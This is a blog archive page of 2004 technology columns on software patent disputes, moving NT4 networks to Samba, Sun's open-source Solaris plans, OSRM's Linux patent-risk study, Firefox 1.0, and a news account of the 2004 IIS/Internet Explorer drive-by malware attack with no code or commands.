Practical Technology

for practical people.

October 5, 2004
by sjvn01
0 comments

Software Patents Gone Bad

Software patents are bad for both open- and closed-source developers, not to mention for anyone who buys software. Isn’t it time we get rid of them once and for all? Open-source and proprietary developers have at least one enemy in common: software patents.
This latest mess with Kodak and Sun is just one of many, many examples of software patents gone amok. In this most recent example, one of Kodaks patents—by way of Wang Labs—covers when applications “ask for help” from another application.

Can you say thats a little broad? I knew you could. Kodak is using it against Java, but Kodak also could use it against Microsoft and its .NET platform.

Kodak says it wont. But I suspect that if Kodak’s victory is upheld and the company has a few more bad quarters … well, lets just say I wouldnt be surprised to find a Kodak lawyer arriving at Microsoft’s Redmond campus.

Software patent law in these United States has become a laughingstock. I may not know the law, but I do know a bad joke when I see one.
Or, well it would be, if it werent so deadly serious.

I know most of you want to read about patent issues the way you do a week-old sports page. Trust me, I want to write about technology, not patent law; but patent law is strangling open- and closed-source software development, so I have to write about it.

It all seemed so funny back in 1999, when Amazon.com started this whole mess by patenting the one-click idea. But now, no one is laughing.
In the past few weeks alone, Forgent Networks has announced that its suing 42 major technology vendors over their use of the JPEG image format; Microsoft’s Sender ID-related patent proposals helped crush a once-promising way to stop spam; and Microsofts own FAT (file allocation table) patent has, for now anyway, been denied. As a developer, closed or open source, you don’t have the time or skills to look for software patents.

For that matter, some experts say you shouldn’t look anyway! “Current U.S. patent law creates an environment in which vendors and developers are generally advised by their lawyers not to examine other peoples software patents, because doing so creates the risk of triple damages for willful infringement,” Daniel Egger, chairman and founder of OSRM (Open Source Risk Management), said a few weeks back.

How did we ever end up in such a mess? Well, Im no lawyer, but Glenn Peterson, who is an IP attorney and shareholder in the Sacramento-based law firm McDonough Holland & Allen PC, said, “Many traditionalists harken back to Thomas Jefferson to remind us that ideas are not patentable. One may patent the tangible fruits of an idea, but not the abstraction, i.e., the idea itself.”

That gets tricky when it comes to software, but the U.S. Patent and Trademark Office has clearly gone too far in enabling companies to patent software—and for that matter, business ideas.

The Public Patent Foundation front page says it all: “Wrongly issued patents and unsound patent policy harm the public: by making things more expensive, if not impossible to afford; by preventing scientists from advancing technology; by unfairly prejudicing small businesses; and by restraining civil liberties and individual freedoms.”

Sounds too grand? Think again. The big patent cases ask for tens of millions to more than a billion dollars in damages. Who ends up paying the bills? The people who buy and use software.

Even when companies win, we—the users and developers—end up paying the bills because top-level patent law is expensive and takes years. Eolas is still fighting Microsoft over basic browser technology found in IE

Think that doesn’t matter to open-source developers? Think again. If upheld, the Eolas patent also can be used against Mozilla or Firefox. No one is safe from patent abuse.

The Public Patent Foundation front page says it all: “Wrongly issued patents and unsound patent policy harm the public: by making things more expensive, if not impossible to afford; by preventing scientists from advancing technology; by unfairly prejudicing small businesses; and by restraining civil liberties and individual freedoms.”

Sounds too grand? Think again. The big patent cases ask for tens of millions to more than a billion dollars in damages. Who ends up paying the bills? The people who buy and use software.

Even when companies win, we—the users and developers—end up paying the bills because top-level patent law is expensive and takes years. Eolas is still fighting Microsoft over basic browser technology found in IE.

Think that doesn’t matter to open-source developers? Think again. If upheld, the Eolas patent also can be used against Mozilla or Firefox. No one is safe from patent abuse.

Heck, even when companies don’t fight, we, as IT buyers, end up spending more because our software providers send the additional cost to us.
The only winners in the patent war are the firms that use them against other companies and the lawyers they employ.

So, what can you do? Well, if you’re in a position of authority, you can discourage your company from taking out stupid patents.

For example, am I the only one who finds it ironic that Sun president Jonathan Schwartz talked in his blog last Thursday about how he supports software patents and then, on the very next day, Kodak socked it to him?

Its not just Sun, though. Microsoft has won—and lost—hundreds of millions of dollars in patent lawsuits. Isnt it time to stop the patent madness?
I think so. You can help by supporting the Public Patent Foundation. You also can write to your representatives in Congress and encourage them to reform patent law in general and, in specific, to take software IP (intellectual property) issues out of patents and into copyright, where it belongs.

A version of this story was first published in eWEEK.

September 17, 2004
by sjvn01
0 comments

Moving from NT to Samba

As you face the end of NT4 support,, you have another alternative to switching to Server 2003: Samba.

If you’re happy with your domain network, or you want to use one Server 2003 system to run AD (Active Directory), you can switch to Samba.

Samba is an open-source program that provides file and print services to SMB (Server Message Block) and CIFS (Common Internet File System) clients. In short, Samba can provide file and printer services for any version of Windows. Samba runs on essentially all Linux/Unix servers. Indeed, the vast majority of Linux servers, such as those from Novell/SuSE and Red Hat, come with Samba.

Why would you bother? There are several good reasons to move to Samba. The first is cost. Not only is Samba free, it can run on the legacy hardware you’re already using for NT.

Personally, I have production Samba servers running on systems as out of date as servers with 100MHz Pentium processors and 64MBs of RAM. Of course, you’ll be a lot better off with more powerful equipment, but my point is that you can run Samba successfully on equipment that couldn’t even boot Server 2003.

Samba is also fast. When I first tested Samba in 1999, it was already delivering files faster than NT. It’s only gotten better since then. In informal tests at my office, I’ve found untuned Samba 3 to be not quite as fast as untuned Server 2003 on the same server hardware.

That said, either one delivers files more than fast enough for most business uses. With performance tuning, I’ve found Samba 3 and Server 2003 ran neck-and-neck. Frankly, if you’re in a situation where server load—and not network bandwidth—is causing performance problems, your problem isn’t your operating system, it’s a need for better systems or hard drives.

If you want to do a simple drop and replacement for your customers’ SMB NT network and not change your network configuration, Samba 2.2 and higher work just fine. Earlier versions of Samba aren’t suitable for use as PDCs (Primary Domain Controllers). For more details, check out “How to Configure Samba 2.2 as a Primary Domain Controller.”

You also can use Samba 3 for NT-style networks, but what’s most useful about Samba 3 for Windows networks is that it supports AD.

With Samba 3, you can join Samba servers to an AD tree as a member server without requiring that AD be running in mixed mode. Typically, you only use mixed mode in networks where you’ll still be using NT servers, or Samba 2.2 or older servers.

You can run Samba 3 with an AD server running native mode. In this mode, you can run Samba 3, W2K (Windows 2000) server and Server 2003. You cannot, however, run Samba 3 in Server 2003 mode, a superset of native mode, which requires that all servers be running Server 2003.

For authentication purposes, your AD server must support LDAP (Lightweight Directory Access Protocol) and Kerberos. In my experience, W2K Server’s LDAP doesn’t work well with OpenLDAP, the usual LDAP server on Linux. Server 2003, however, gives far less trouble.

As I’ve said before in this series, whether you use Samba or not, Server 2003—not W2K—is simply the better Windows server upgrade option. On the Samba side, Samba 3.07 is the latest edition, and since it has several security fixes, I highly recommend you upgrade your Samba server to it before starting a migration.

Once you have Kerberos working, either MIT or Heimdal Kerberos on the Linux side, you’ll need to manually enter the Samba 3 Server into AD. With that done, you’ll want to add file shares and printers using Samba’s—typically with the SWAT Web interface, but you can do it via the Unix command line or by editing the Samba configuration files. These resources should then appear in AD management consoles and to Windows 2000, XP and 2003 clients.

What about 95, 98 or ME? Unfortunately, these operating system require the NT/LAN Manager (NTLM) challenge/response authentication protocol, and AD’s native mode doesn’t support that. Instead, it exclusively uses Kerberos for user authentication. So, if you still have those operating systems on your clients, you don’t want to upgrade to AD or Samba 3 using AD native mode. For better or worse, you still must use either a mixed mode or an NT-style domain system.

For your basic Samba setup, you can use the Web-based SWAT (Samba Web Based Administration Tool). But you may not want to use SWAT once you’re past your initial installation. That’s because SWAT always replaces the master Samba configuration file, smb.conf, with an optimized version of the file. That means, that any comments you’ve made in the file will be lost. Whoops!

Although it’s not part of Samba, I find that a better choice for a GUI-based Samba administration is Webmin. This is a useful, open-source, Web-based interface for Unix and Linux system administration. I highly recommend it not just for Samba but for many other Unix and Linux management jobs.

If you must use W2K Server AD with Samba 3, you may want to give MKS AD4Unix (ZIP file) a try. This is an AD Server plug-in that enables Unix-related authentication and user information to be stored in AD and managed via the MMC (Microsoft Management Console). Its goal is to create a unified user and computer account database for Windows and Unix servers via Active Directory.

I recommend, however, that you try this approach only if you know both AD and Unix administration extremely well. If possible, the better approach is simply to use Server 2003 instead of W2K.

Or, of course, you could simply use Samba in place of your NT domain system. The choice is up to you.

From the users’ perspective, though, it’s all moot. Whether as a complete replacement or as part of a Server 2003-based network, once set up properly, Samba works exactly like NT as far as they’re concerned.

Thus, given Samba’s improved security, cost and speed over pure-Microsoft approaches, I believe you should seriously consider Samba for any of your cost-conscious customers.

Finally, before starting on your journey to Samba, I’d like to strongly recommend that you get a copy of The Official Samba-3 HOWTO and Reference Guide. You also can read most of this material online at the Samba HOWTO collection. Both will go a long way toward making sure your NT-to-Samba upgrade goes smoothly.

A version of this story first appeared in Channel Insider.

September 13, 2004
by sjvn01
0 comments

No News is Open-Source Solaris News

Dear Sun,

Since your president and COO is so fond of open letters, I thought I might deliver one of my own.

On Monday, at a press conference in Burlington, Mass., you announced that you were open-sourcing Solaris 10. You also said that Solaris 10 would have a new file system, and that Solaris 10 users will be able to run Linux programs.

I dont understand. Is it just me, or have we heard all this before?

You said you still didnt know what you were going to do about an open source license. In fact, I found out that you havent approached OSI (Open Source Initiative) about any license for open-source Solaris yet. Danese Cooper, head of Suns Open Source Programs Office, does tell me, “It will be under an OSI -approved license. We have not yet submitted a license.”

Maybe its just me but isnt having an open-source license kind of fundamental to having an open-source project?

Now, I do know that youve been talking with some developers under non-disclosure agreements lately about open-source Solaris. I also know theyre not happy with what they see as a lack of any real progress.

Jason Perlow, owner of Argonaut Systems, an integrator, and someone in the know when it comes to open-source Solaris, says that Suns Monday announcement, “showed no actual plans or forward movement with the open source community.”

Could it be that thats because, as Perlow puts it, “I dont see how they can open source Solaris until SCO is no longer a viable company and to say anything else is just smoke and mirrors.”

Ah yes, thats right. SCO owns Unix. Or, well, at least they and their high-powered attorneys claim they do anyway.

As Dan Kusnetzky, IDCs program VP for system software, told me, “Its hard for me to understand this (Sun open sourcing Solaris). While Sun pre-paid their royalties for Unix a long time ago, they would still agree that it is a derivative work-it is Unix. The SCO Group is the current owner of Unix and is not at all likely to allow its intellectual property to be freely given away under any open source license. I dont understand how Sun could give away what they dont own.”

Thats a good question. So I asked SCO for an answer.

This is what the boys from Lindon, Utah had to say through Blake Stowell, SCOs PR director: “All I can say is that Sun has the broadest rights of any Unix licensee while at the same time, were confident that Sun knows and understands the terms of that Unix license.”

That doesnt sound like a ringing endorsement for Sun to go ahead and open source System V Unix, Solaris Unix foundation, to me.

Now, I have an idea. Call me crazy, but how about the next time your competitors—like Novell, with its Linux announcements, or IBM with its Power5 Linux release—have real news, why dont you keep quiet until you have something real to say yourself?

It seems to me that youve developed a bad habit of manufacturing news when you really dont have any. Remember how your president said Sun was thinking of buying Novell during LinuxWorld a few weeks back and no one took you seriously?

If you want me, and much more importantly your customers and partners to take you seriously, I think you should stick to announcing news only when you have real news.

Sincerely,

Steven

A version of this story first appeared in eWEEK.

August 2, 2004
by sjvn01
0 comments

Open-Source Insurance Provider Finds Patent Risks in Linux

SAN FRANCISCO—On Monday, OSRM, a provider of open-source consulting and risk mitigation insurance, announced that the group has found that there are 283 issued, but not yet court-validated, software patents that could conceivablly be used in patent claims against Linux.

Thats the potential bad news for Linux developers and users. The good news is that the Linux kernel contains no court-validated software patents. For those who are seriously concerned about the risks, OSRM (Open Source Risk Management)will be offering a litigation insurance policy starting in 2005.

OSRM began offering copyright infringement insurance to Linux users in April 2004.

Patent attorney Dan Ravicher, leader of the OSRM patent study and executive senior counsel to the Free Software Foundation, added that only about “half of software patents stand up in court.”

Of those 283 issued patents, Ravicher continued, “about a third are held by organizations or companies that are seen as Linux friendly: IBM, HP, Novell, Red Hat, etc. At the same time, though, 10 percent of these patents are held by Microsoft.”

Ravicher also points out that, “This is not a doomsday scenario. This number of potential patent concerns is typical for a software product of the size and complexity of Linux.”

OSRM wont publicly say what the specific software patents are that potentially affect Linux because it “would put the whole developer community at risk.”

Thats because of what he describes as the “Catch-22 of patent law … Patent law is meant to popularize technology, but at the same time if you look at software patents as a developer, you put yourself at more legal risk.”

“Current U.S. patent law creates an environment in which vendors and developers are generally advised by their lawyers not to examine other peoples software patents, because doing so creates the risk of triple damages for willful infringement,” explained Daniel Egger, chairman and founder of OSRM.

“This studied ignorance leaves the field open to those who would spread fear and disinformation. It also means that only a vendor-neutral entity, like OSRM, has the freedom and incentive to assess the true risks.”

So what can developers and users do?

According to Ravicher, they have five possible approaches.

First, he suggests advocating for “patent policy reform.” Because as it is now, “Its ridiculous.” But, while this would be the best, comprehensive answer, “it will take a while-years-if ever before the laws are reformed.

Next, if you already suspect theres a specific patent that might be a problem for Linux, start looking for prior art to get the patent overturned if its holder tries to take it to court.

There is already a public project, Grokline, which is working on “creating a history of Unix and Unix-like code with the goal of reducing, or eliminating, the amount of software subject to superficially plausible but ultimately invalid copyright, patent and trade secret claims against Linux or other free and open source software.” Grokline is directed by Pamela Jones of Groklaw, the well-known SCO litigation news site, and receives support from OSRM.

You can also be ready to design around existing patents. This can only be done on a case by case basis and again its something of a Catch-22 since you can only design around it, said Ravicher “after the threat is upon you.”

In such cases, however, its not enough to show that you immediately acted to take care of the patent issue. Ravicher explains, “The rule is that you must have an attorney state that, in their expert opinion, youve taken such action.” Such letters, Ravicher continued from qualified attorneys run around 20 to 40 thousand dollars.

Finally, Ravicher says “You can simply pay for a patent license so long as you do so in a way that doesnt conflict with the GPL.”

Many people, he adds think that patent licenses almost always conflict with open source licenses but thats not the case. “Some patent licenses are compatible with GPL and some patent-holders are willing to expressively say that in their licenses.

The problem with most of these solutions continued Ravicher is “that theyre one-shot, case-by-case answers. There is no immediate and comprehensive solution.”

In response, OSRM will be expanding its risk mitigation and insurance offerings to cover this quantifiable risk.

“Patents pose a financial risk to corporate Linux users-just like they do to corporate users of almost any software-because, whether or not a patent is truly infringed, it costs $3 million dollars on average to defend a patent lawsuit,” said Ravicher. “This heavy cost of proving even weak patents invalid could fall on unprepared end-users, who, until now, have often been forced to pay settlements to avoid risking millions on litigation. Orems new patent insurance gives such end-users another way to address the issue, as it is a direct competitive alternative to licensing or litigating.” Ravicher summed up his findings.

Specifically, OSRM will be supplying patent-infringement defense insurance for Linux developers and users. At first, this program, which will roll out in 2005, will only be available for the Linux kernel, but OSRM will it extend it to more open-source programs over time. The insurance, which caps out at $5 million, will pay for a legal defense and for damages.

“The most important message to take away, based on Orems proprietary research and quantitative models and the best independent legal analysis available to us, is that the core of the Linux operating system appears to be a normal, insurable patent risk for the businesses that use it. And, based on our hands-on work with many different types of customers, we have found the total cost of ownership of using Linux to still be dramatically lower than proprietary alternatives for customers that add in the cost of effective risk-management,” said Egger.

“What it boils down to is that Linux has patent risks; but they can and will become conventional insured risks, just an everyday cost of doing business. OSRMs whole mission is to make the issue of Linux liability simple, routine, and manageable.”

A version of this story first appeared in eWEEK.

July 12, 2004
by sjvn01
0 comments

Firefox 1.0 is almost here

The final version of Mozilla’s Firefox will be arriving on September 14th accoding to lead engineer, Ben Goodger.

Open source browser fans, and those who have grown distrustful enough of Internet Explorer’s security flaws to consider alternative browsers, will be looking forward to the first non-beta release of the Mozilla Foundation’s Firefox. This standalone browser has been in development since 2002.

The Mozilla Foundation renamed its standalone browser, formerly known as Mozilla Firebird, to Firefox with its 0.8 release earlier this year.

Goodger’s says, ” Our target for our 1.0 release is ‘best of breed’ browser product on Windows, Linux, and MacOS X and before we can make that claim, a number of things need to be done.” These include squashing “high complexity/risk and localization impact” bugs.

To make the ambitious release date, some features, such as the Font Options UI (user interface) and the Bookmarks Manager UI have been frozen.

Still, as a quick look at the Firefox 1.0 Release Forum will show, users are concerned that the developers are pushing too hard to release the program on time without fixing minor bugs, such as memory leaks, which others regard as “showstoppers.”

Goodger addresses these concerns in the forum writing, “Again, no software release is ever flawless. We need to draw a line in the sand otherwise we’ll never ship, which means we’ll never be able to begin the more aggressive feature goals we have for the post 1.0 period.”

Goodger is also well aware that recent Internet Explorer security problems has greatly increased interest in Firefox, ” as a result of the IE security scares, (there has been) 722,000 downloads of 0.9.1 in one week from Mozilla servers.”

Marius Kirschner, president of the small NY/NJ ISP, Agora Online, is one of those 722-thousand, “I tried FoxFire last week. I have to say I’m impressed. The pages load faster, I’m in love with the tabbed browsing, it has a build-in popup stopper and a host of other well thought out features. It’s been now 5 days and I don’t intent to switch back.”

That said, as others have observed, Kirschner has found some trouble with IE-specific sites. “The bad news is that at least one of my admin sites was written for IE and if I want to access that site I need to use IE. However, unless I run into some major problems I’ll keep FoxFire as my primary browser.”

So it is that between IE security concerns and Firefox’s increased functionality, it appears that there will already be a large user community awaiting Firefox’s final release this fall.

A version of this story first appeared in eWEEK.

June 28, 2004
by sjvn01
0 comments

Internet Explorer Is Too Dangerous to Keep Using

OK, I confess it: I’ve used Internet Explorer a lot. After being a die-hard Netscape user, I finally got fed up with the sheer bulk of that browser and started using Internet Explorer on my Windows machines.

As time went on and open-source Mozilla matured, I started using Mozilla as my main Linux Web browser and as my secondary Windows browser. This past Friday, though, I started installing Firefox, the browser-only side of Mozilla, on every one of my production Windows machines.

Why? Because Internet Explorer, like Outlook, has finally become, to my mind, a permanent security hole that masquerades as a useful application.

Strong words? Have you really thought about this latest exploit? It could hit every Internet Explorer (IE) browser that merely visited any page served by an infected Microsoft IIS (Internet Information Server).

No anti-virus program would stop it, no firewall would slow it down and no shipping IE security patch would even notice it. Visit the page, get the infection. It was that simple.

Oh, but the few thousand people running Release Candidate 2 of Windows XP Service Pack 2 were not vulnerable to the client-side attack. And if you were one of the very few people who had all of the current critical patches installed and were running IE with its security settings at “high,” you’d be OK. That leaves, oh, say, 95 percent of all IE users wide open to this attack. I feel so much better now.

And just how bad was this attack? Boys and girls, let me tell you, this was the worst security violation I have ever seen. But don’t take my word for it.

Johannes Ullrich, a handler at the Internet Storm Center at The SANS Institute in Bethesda, Md., wrote, “A large number of Web sites, some of them quite popular, were compromised earlier this week to distribute malicious code.

“The attacker uploaded a small file with JavaScript to infected Web sites and altered the Web server configuration to append the script to all files served by the Web server (IIS). The Storm Center and others are still investigating the method used to compromise the servers. Several server administrators reported that they were fully patched.”

What sites were spreading the infections? We still don’t know. Neither the security companies nor the businesses running the infected sites are talking. Since theyre not being any help, I can only suggest that you update your anti-viral software and run it—now.

The only other thing I can say is that sites running IIS 5, which hadn’t been patched up to Aprils MS04-011, were the ones targeted by this exploit. But, Im sorry to say, its still not clear that even sites that had been patched with MS04-011 were safe. There are reports that even patched IIS servers were infected.

What happened next was that after simply visiting what looked like a perfectly ordinary page, the JavaScript hidden with the page would direct your browser to quietly download and install one of several different programs from a Russian Web site. “These Trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system,” Ullrich said.

A version of this story was first published in eWeek.